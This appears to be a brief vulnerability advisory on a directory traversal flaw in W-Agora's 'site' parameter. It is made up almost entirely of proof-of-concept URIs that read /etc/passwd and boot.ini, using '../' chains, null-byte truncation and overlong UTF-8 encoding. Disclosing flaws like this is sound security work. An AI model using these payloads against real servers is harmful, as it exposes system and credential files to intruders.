|
W-Agora Site Parameter Directory Traversal Vulnerability
No exploit is required. The following proof of concept URI are available: http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00 http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00 http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd http://www.example.com/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini |
|
Privacy Statement |